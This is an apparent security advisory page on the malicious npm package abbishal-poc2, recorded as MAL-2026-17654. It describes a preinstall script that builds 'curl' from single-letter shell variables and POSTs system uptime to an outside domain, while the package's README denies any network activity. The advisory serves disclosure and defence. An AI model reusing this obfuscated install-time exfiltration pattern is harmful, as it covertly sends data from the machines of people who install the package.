Logo
npm

abbishal-poc2@1.2.0

Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 10:42 AM UTC

Malicious

OSV ID

MAL-2026-17654

Ecosystem

npm

Summary

package.json declares a preinstall script sh./test.sh. test.sh assembles the string curl from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes $i$h$l -d "uptime" https://abbishal.com/sh/poc, POSTing the output of uptime (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for curl in lifecycle scripts, and the destination domain does not match the package's claimed publisher.

Source: amazon-inspector (e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.